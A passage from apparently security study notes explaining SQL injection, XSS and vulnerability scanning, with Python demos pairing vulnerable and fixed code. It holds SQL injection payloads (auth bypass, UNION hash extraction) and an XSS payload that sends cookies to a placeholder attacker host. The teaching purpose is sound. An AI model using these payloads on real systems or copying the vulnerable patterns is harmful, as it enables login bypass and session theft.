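                     [("admin", "h_admin"), ("alice", "h_alice")])
    return conn


def login_vulnerable(conn, username, password_hash):
    # Untrusted input is pasted into the SQL text, so the input can change the query's
    # structure: a quote ends the string, OR 1=1 makes the WHERE clause true, and --
    # comments out the password check.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password_hash = '{password_hash}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password_hash):
    # Parameterized query: the SQL structure is fixed; the ? placeholders are bound to the
    # values by the driver, so a quote in the input is just a character in a string.
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    row = conn.execute(sql, (username, password_hash)).fetchone()
    return row[0] if row else None


# Classic payloads, as they would be typed into the username field.
AUTH_BYPASS = "' OR 1=1 --"
DATA_EXFIL = "' UNION ALL SELECT password_hash FROM users --"

if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable, bypass :", login_vulnerable(conn, AUTH_BYPASS, "wrong"))
    print("vulnerable, exfil  :", login_vulnerable(conn, DATA_EXFIL, "wrong"))
    print("safe, bypass       :", login_safe(conn, AUTH_BYPASS, "wrong"))
    print("safe, real login   :", login_safe(conn, "alice", "h_alice"))
```

The safe version returns None for both payloads because the database looks for a user literally named `' OR 1=1 --`. Note what parameterization does not fix: the vulnerable function also runs as whatever database account the application uses, so a read-only, single-schema account would have limited the UNION payload even before the code was fixed.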
19. What is Cross-Site Scripting (XSS)? Reflected XSS? Stored XSS?

A. Cross-Site Scripting (XSS) is a web application vulnerability that allows attackers to
inject scripts into web pages viewed by other users; the script then runs in the victim's
browser with the victim's session.

B. There are two main types of XSS (a third, DOM-based XSS, is caused by client-side script
writing untrusted data into the page):

a. Reflected XSS or non-persistent attacks are delivered to victims through emails,
websites, social media platforms, etc. When a user is tricked into clicking on a malicious
link, submitting a specially crafted form, or even just browsing to a malicious site, the
injected code travels to the vulnerable website, which reflects the attack back to the
user's browser. The browser then executes the code because it came from a "trusted"
server.
b. Stored or persistent XSS: stored attacks are those where the injected script is
permanently stored on the target servers, such as in a database, a message forum, a
visitor log, a comment field, etc. The victim then retrieves the malicious script from the
server when requesting the stored information.

C. Context-aware output encoding (escaping user data when it is written into HTML, attributes,
JavaScript or URLs) is the main protection from XSS attacks; input validation, a Content
Security Policy and HttpOnly cookies add defense in depth.

Keywords: inject script, input validation, output encoding.


More resources: Cross Site Scripting (XSS) | OWASP Foundation
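Added example, not part of the original notes: a stored-XSS comment list and a reflected search echo, each in a vulnerable form and an output-encoded form. The comments and payloads are constructed (attacker.example is a placeholder host); the rendering functions stand in for a template engine and use Python's html.escape for the HTML body context only.

```python
import html

# Constructed stored comments; the second is a payload as an attacker would post it in a
# comment field (stored XSS). The attacker.example host is a placeholder.
COMMENTS = [
    "Great article!",
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
]


def render_comments_vulnerable(comments):
    # User data interpolated straight into HTML: the browser parses the payload as markup
    # and runs the onerror handler with the viewer's cookies in scope.
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"


def render_comments_safe(comments):
    # Output encoding for the HTML body context: < > & " ' become entities, so the payload
    # is displayed as text and never becomes an element.
    return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in comments) + "</ul>"


def render_search_vulnerable(q):
    # Reflected XSS: a query-string parameter echoed back in the response.
    return f"<p>Results for: {q}</p>"


def render_search_safe(q):
    return f"<p>Results for: {html.escape(q)}</p>"


def contains_injected_markup(rendered):
    """Crude oracle for the demo: did user data end up as a tag or a live event handler?"""
    return any(marker in rendered for marker in ("<img", "<script", 'onerror="'))


REFLECTED_PAYLOAD = "<script>alert(document.domain)</script>"

if __name__ == "__main__":
    print(render_comments_vulnerable(COMMENTS))
    print(render_comments_safe(COMMENTS))
    print(render_search_vulnerable(REFLECTED_PAYLOAD))
    print(render_search_safe(REFLECTED_PAYLOAD))
```

html.escape is right for text between tags; data written into an unquoted attribute, a JavaScript string or a URL needs that context's own encoding, which is why template engines with automatic contextual escaping are preferred over calling an escape function by hand.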

*********************************************************************************************************

20. What is a vulnerability scan?

A. Vulnerability scanning is the process of identifying security weaknesses and
vulnerabilities in systems and the software running on them, typically by matching the
versions and configurations found against a database of known issues (CVEs,
misconfigurations, missing patches).

B. A vulnerability scanner is a program that performs such a scan. An authenticated scan
(with credentials on the host) finds far more than an unauthenticated one, and a scan is not a
penetration test: it finds known weaknesses but does not exploit or chain them.

C. Performing these vulnerability scans regularly is a common requirement for compliance (for
example PCI DSS; NIST SP 800-115, Section 4.3 describes the practice) and helps to minimize an
organization's cybersecurity risk.

More resources: Technical guide to information security testing and assessment


Video resource: MicroNugget: How to Do Penetration Testing and Vulnerability Scanning
